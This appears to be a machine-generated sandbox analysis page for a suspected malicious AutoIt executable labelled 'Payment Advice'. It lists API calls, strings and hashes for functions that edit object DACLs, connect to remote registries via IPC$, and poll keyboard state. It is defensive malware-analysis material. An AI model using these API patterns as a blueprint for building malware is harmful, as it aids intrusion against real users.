Function 005BA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005BABD7
Part of subcall function 005BABBB: GetLastError.KERNEL32(?,005BA69F,?,?,?), ref: 005BABE1
Part of subcall function 005BABBB: GetProcessHeap.KERNEL32(00000008,?,?,005BA69F,?,?,?), ref: 005BABF0
Part of subcall function 005BABBB: HeapAlloc.KERNEL32(00000000,?,005BA69F,?,?,?), ref: 005BABF7
Part of subcall function 005BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005BAC0E

Part of subcall function 005BAC56: GetProcessHeap.KERNEL32(00000008,005BA6B5,00000000,00000000,?,005BA6B5,?), ref: 005BAC62
Part of subcall function 005BAC56: HeapAlloc.KERNEL32(00000000,?,005BA6B5,?), ref: 005BAC69
Part of subcall function 005BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005BA6B5,?), ref: 005BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005BA8CB
_memset.LIBCMT ref: 005BA8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005BA8FF
GetLengthSid.ADVAPI32(?), ref: 005BA910
GetAce.ADVAPI32(?,00000000,?), ref: 005BA94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005BA969
GetLengthSid.ADVAPI32(?), ref: 005BA986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005BA995
HeapAlloc.KERNEL32(00000000), ref: 005BA99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 005BA9BD
CopySid.ADVAPI32(00000000), ref: 005BA9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005BA9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005BAA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 005BAA2F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 07522676edf3a8d8c0374fe18d7367419aa4fdfabbf5eee820fc3c11c02c7ea1
Instruction ID: 7f41790809abdd52f7a499da4d5099f384c8629b152bf832da0261b6ab230f4c
Opcode Fuzzy Hash: 07522676edf3a8d8c0374fe18d7367419aa4fdfabbf5eee820fc3c11c02c7ea1
Instruction Fuzzy Hash: 94512D7190020AAFDF14DF94DD45EEEBBBAFF44300F148159F916A7290DB35AA05CB61

Function 005CCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 005CCCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 005CCCC5
__swprintf.LIBCMT ref: 005CCD1E
__swprintf.LIBCMT ref: 005CCD37
_wprintf.LIBCMT ref: 005CCDED
_wprintf.LIBCMT ref: 005CCE0B

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 005CCDE8
Line %d (File "%s"):, xrefs: 005CCD18, 005CCD31
^ ERROR, xrefs: 005CCD8F
"%s" (%d) : ==> %s:, xrefs: 005CCE06
Error: , xrefs: 005CCDB5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 7a1f0e0d7cc8c2763729fc9e2682b0d59531448bea2c66def6c8c6a6282a49c6
Instruction ID: 6f5996cb3029cff12d5101e1ca022a6d97af8e40dcc305bddb67aa2f94bdbfd9
Opcode Fuzzy Hash: 7a1f0e0d7cc8c2763729fc9e2682b0d59531448bea2c66def6c8c6a6282a49c6
Instruction Fuzzy Hash: 1C516E3180051AAACB15FBE0CD4AEEEBF79BF45304F100169F905761A2EB316F55DB60

Function 005CCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 005CCA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005CCAB0
__swprintf.LIBCMT ref: 005CCB09
__swprintf.LIBCMT ref: 005CCB22
_wprintf.LIBCMT ref: 005CCBCD
_wprintf.LIBCMT ref: 005CCBEB

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 005CCBC8
Line %d (File "%s"):, xrefs: 005CCB03, 005CCB1C
"%s" (%d) : ==> %s:, xrefs: 005CCBE6
Error: , xrefs: 005CCB95
^ ERROR , xrefs: 005CCB64

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 9e01fe251f9bc19a2427e3bab63851b008d777121d9aa97fc06298dc8c408d3d
Instruction ID: e3fc2cec9b50eeecbc19b1b9781d4db2eca52b06148d985d911f35aad3dafaeb
Opcode Fuzzy Hash: 9e01fe251f9bc19a2427e3bab63851b008d777121d9aa97fc06298dc8c408d3d
Instruction Fuzzy Hash: 3E518F3180061AAACB15FBE0CD4AEEEBF79BF45344F500065F90572092EA346F59DB60

Function 005E3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,005E2BB5,?,?), ref: 005E3C1D

Strings

HKCC, xrefs: 005E3CD1
HKU, xrefs: 005E3D15
HKEY_CLASSES_ROOT, xrefs: 005E3C96
HKEY_CURRENT_CONFIG, xrefs: 005E3CC0
$Ec, xrefs: 005E3C36
HKEY_USERS, xrefs: 005E3D04
HKCR, xrefs: 005E3CAB
HKCU, xrefs: 005E3CF3
HKEY_LOCAL_MACHINE, xrefs: 005E3C6C
HKLM, xrefs: 005E3C81
HKEY_CURRENT_USER, xrefs: 005E3CE2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharUpper
String ID: $Ec$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-2028930731
Opcode ID: 6fb8aaec4ff7b3a605b998afa04d179f6990887558939a61d5452c436ddb36e3
Instruction ID: 74650a06541681e2d09140beaa71d05153cd544e2cc646435aa229dd2ec10a96
Opcode Fuzzy Hash: 6fb8aaec4ff7b3a605b998afa04d179f6990887558939a61d5452c436ddb36e3
Instruction Fuzzy Hash: 07413E3051028A9BDF08EF11DD59AEA3F66BF52350F504864ECD56B392EB70EE0ACB50

Function 005C55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 005C5664
GetMenuItemCount.USER32(00641708), ref: 005C56ED
DeleteMenu.USER32(00641708,00000005,00000000,000000F5,?,?), ref: 005C577D
DeleteMenu.USER32(00641708,00000004,00000000), ref: 005C5785
DeleteMenu.USER32(00641708,00000006,00000000), ref: 005C578D
DeleteMenu.USER32(00641708,00000003,00000000), ref: 005C5795
GetMenuItemCount.USER32(00641708), ref: 005C579D
SetMenuItemInfoW.USER32(00641708,00000004,00000000,00000030), ref: 005C57D3
GetCursorPos.USER32(?), ref: 005C57DD
SetForegroundWindow.USER32(00000000), ref: 005C57E6
TrackPopupMenuEx.USER32(00641708,00000000,?,00000000,00000000,00000000), ref: 005C57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005C5805

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 82393cb28e26b371cddbc642e8134c1b8ff5ab9aaedd32511bbd5c3f836b5e6d
Instruction ID: f92e7e9ba820bef004d4708111eae9c5212a330ab1cba6107b766966307bb457
Opcode Fuzzy Hash: 82393cb28e26b371cddbc642e8134c1b8ff5ab9aaedd32511bbd5c3f836b5e6d
Instruction Fuzzy Hash: 7571E370640605BEEB219BD4CC49FAABFA6FF40368F240209F5196A1D1E7B16CD0DBA0

Function 005BA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005BA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005BA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005BA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005BA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005BA273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 005BA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005BA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005BA2AB

Strings

\IPC$, xrefs: 005BA1F3
\CLSID, xrefs: 005BA193
SOFTWARE\Classes\, xrefs: 005BA17D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: a4b869411808bd4abf49cd96556d294c3f65164c47251db5efe38a062917b15f
Instruction ID: 4dc69940fbd46b6aac72996cbf5a27b6d462a055601bac46cef5f0771d751fcd
Opcode Fuzzy Hash: a4b869411808bd4abf49cd96556d294c3f65164c47251db5efe38a062917b15f
Instruction Fuzzy Hash: AA41DA76C1062AAADB15EBA4DC99DEEBBB9FF44704F004129E905B3161EB70AD05CB50

Function 005C67E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 005C67FD
__swprintf.LIBCMT ref: 005C680A

Part of subcall function 005A172B: __woutput_l.LIBCMT ref: 005A1784

FindResourceW.KERNEL32(?,?,0000000E), ref: 005C6834
LoadResource.KERNEL32(?,00000000), ref: 005C6840
LockResource.KERNEL32(00000000), ref: 005C684D
FindResourceW.KERNEL32(?,?,00000003), ref: 005C686D
LoadResource.KERNEL32(?,00000000), ref: 005C687F
SizeofResource.KERNEL32(?,00000000), ref: 005C688E
LockResource.KERNEL32(?), ref: 005C689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 005C68F9

Strings

5c, xrefs: 005C67F6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5c
API String ID: 1433390588-2461755080
Opcode ID: c48af58f91712c5658b05399654191656207234a93bc51060e546976db00fd71
Instruction ID: 2ee50a44ef7461a69ae4b6c11f795ce9557cb057ebb9ae3c02b09a994bae5e20
Opcode Fuzzy Hash: c48af58f91712c5658b05399654191656207234a93bc51060e546976db00fd71
Instruction Fuzzy Hash: 1131AE7590021AAFDB119FA0DD48EBF7FA9FF09344F008529FA02D6140E734DA51DBA0

Function 005C25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005F36F4,00000010,?,Bad directive syntax error,0061DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 005C25D6
LoadStringW.USER32(00000000,?,005F36F4,00000010), ref: 005C25DD
_wprintf.LIBCMT ref: 005C2610
__swprintf.LIBCMT ref: 005C2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005C26A1

Strings

Line %d (File "%s"):, xrefs: 005C2647
Line %d:, xrefs: 005C262C
., xrefs: 005C2687
Error: , xrefs: 005C266F
%s (%d) : ==> %s.: %s %s, xrefs: 005C260B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: f6be3efdda7bd966b04a2193975412867b5970998becdf4880b23fdf39e043a9
Instruction ID: 1c3ab65282b534465f82747fb751d773c2b6075ff9bfbaa88a9594bde231a7d3
Opcode Fuzzy Hash: f6be3efdda7bd966b04a2193975412867b5970998becdf4880b23fdf39e043a9
Instruction Fuzzy Hash: 28212C3184022AAFCF12BB90CC4EEEE7F79BF19304F044459F905761A2EA71A658DB60

Function 005C7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005C7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005C7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005C7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005C7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005C7B8C

Strings

open , xrefs: 005C7AF1
play PlayMe, xrefs: 005C7B87
alias PlayMe, xrefs: 005C7B1B
status PlayMe mode, xrefs: 005C7B3D
play PlayMe wait, xrefs: 005C7B76
close PlayMe, xrefs: 005C7B53, 005C7B80

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: fde41901417df6f070f01a991f2f62884e97a56648d344c0f780280b88ea0783
Instruction ID: 1c0e40130dfdfbe5bf3776db267abcec3198484cea8af243b7973d784f2b118b
Opcode Fuzzy Hash: fde41901417df6f070f01a991f2f62884e97a56648d344c0f780280b88ea0783
Instruction Fuzzy Hash: 8811B2A064026A79D720B7A1CC4EEFFBFBCFBD5B04F0004197811B61C1EA605E49CAB0

Function 005C778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 005C7794

Part of subcall function 0059DC38: timeGetTime.WINMM(?,75C0B400,005F58AB), ref: 0059DC3C

Sleep.KERNEL32(0000000A), ref: 005C77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 005C77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 005C7806
SetActiveWindow.USER32 ref: 005C7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005C7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 005C7852
Sleep.KERNEL32(000000FA), ref: 005C785D
IsWindow.USER32 ref: 005C7869
EndDialog.USER32(00000000), ref: 005C787A

Strings

BUTTON, xrefs: 005C77F8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: e793c9430efd92a9c0a285fdc9d4406e03c0faaf3429fec96d6a37f5a4c9a2f9
Instruction ID: be077d0e00afb2f68f6aadea8ed38a136c81e8bfc99caee5dc1ecf3d1a975c15
Opcode Fuzzy Hash: e793c9430efd92a9c0a285fdc9d4406e03c0faaf3429fec96d6a37f5a4c9a2f9
Instruction Fuzzy Hash: BF2129B4244249AFE7025FE0EC8DF263F7BFB4A348F002128F50692662DBA19D10DA20

Function 005D02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

CoInitialize.OLE32(00000000), ref: 005D034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005D03DE
SHGetDesktopFolder.SHELL32(?), ref: 005D03F2
CoCreateInstance.OLE32(0060DA8C,00000000,00000001,00633CF8,?), ref: 005D043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005D04AD
CoTaskMemFree.OLE32(?,?), ref: 005D0505
_memset.LIBCMT ref: 005D0542
SHBrowseForFolderW.SHELL32(?), ref: 005D057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005D05A1
CoTaskMemFree.OLE32(00000000), ref: 005D05A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 005D05DF
CoUninitialize.OLE32(00000001,00000000), ref: 005D05E1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: e1caf969c32cf4017ee6e98badd1746ea8ce51ebd6fd0cb8230ef49d5838366a
Instruction ID: b2f41b82cb53f43da1ebbb4c2ca6a9ae580641059660a911a18e06bc8e09f7ee
Opcode Fuzzy Hash: e1caf969c32cf4017ee6e98badd1746ea8ce51ebd6fd0cb8230ef49d5838366a
Instruction Fuzzy Hash: 6DB1C975A00109AFDB14DFA8C889EAEBBB9FF88304F14945AE905EB351DB70ED41CB50

Function 005C2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 005C2ED6
SetKeyboardState.USER32(?), ref: 005C2F41
GetAsyncKeyState.USER32(000000A0), ref: 005C2F61
GetKeyState.USER32(000000A0), ref: 005C2F78
GetAsyncKeyState.USER32(000000A1), ref: 005C2FA7
GetKeyState.USER32(000000A1), ref: 005C2FB8
GetAsyncKeyState.USER32(00000011), ref: 005C2FE4
GetKeyState.USER32(00000011), ref: 005C2FF2
GetAsyncKeyState.USER32(00000012), ref: 005C301B
GetKeyState.USER32(00000012), ref: 005C3029
GetAsyncKeyState.USER32(0000005B), ref: 005C3052
GetKeyState.USER32(0000005B), ref: 005C3060

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f0d456341a302d98421d369bd28fdba9e3ccaf9869c93b72db88f645b9527225
Instruction ID: f4a35043ceb0f3d91c32dab4dbbe440027d929b1ba68dafb637d3e360b0090ab
Opcode Fuzzy Hash: f0d456341a302d98421d369bd28fdba9e3ccaf9869c93b72db88f645b9527225
Instruction Fuzzy Hash: F651D9259047882DFB35DBE48815FEABFF46F11340F08859DD5C2661C2DA949B8CCBA2

Function 005BED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 005BED1E
GetWindowRect.USER32(00000000,?), ref: 005BED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 005BED8E
GetDlgItem.USER32(?,00000002), ref: 005BED99
GetWindowRect.USER32(00000000,?), ref: 005BEDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 005BEE01
GetDlgItem.USER32(?,000003E9), ref: 005BEE0F
GetWindowRect.USER32(00000000,?), ref: 005BEE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 005BEE63
GetDlgItem.USER32(?,000003EA), ref: 005BEE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005BEE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 005BEE9B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: c87f4e50e696a0f076b4cfa99368ab37b4ef7dedd6cf20caa8ba44ed87b22199
Instruction ID: 1adf7b530bd3c753bc722f36d916b695f4b74b5770a6c5bf25c4453b85cfa53a
Opcode Fuzzy Hash: c87f4e50e696a0f076b4cfa99368ab37b4ef7dedd6cf20caa8ba44ed87b22199
Instruction Fuzzy Hash: 22510571B50205AFDB14CFA9DD96AAEBBBAFB88700F14822DF515D7290D771ED008B10

Function 0059B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0059B759,?,00000000,?,?,?,?,0059B72B,00000000,?), ref: 0059BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0059B72B), ref: 0059B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0059B72B,00000000,?,?,0059B2EF,?,?), ref: 0059B88D
DestroyAcceleratorTable.USER32(00000000), ref: 005FD8A6
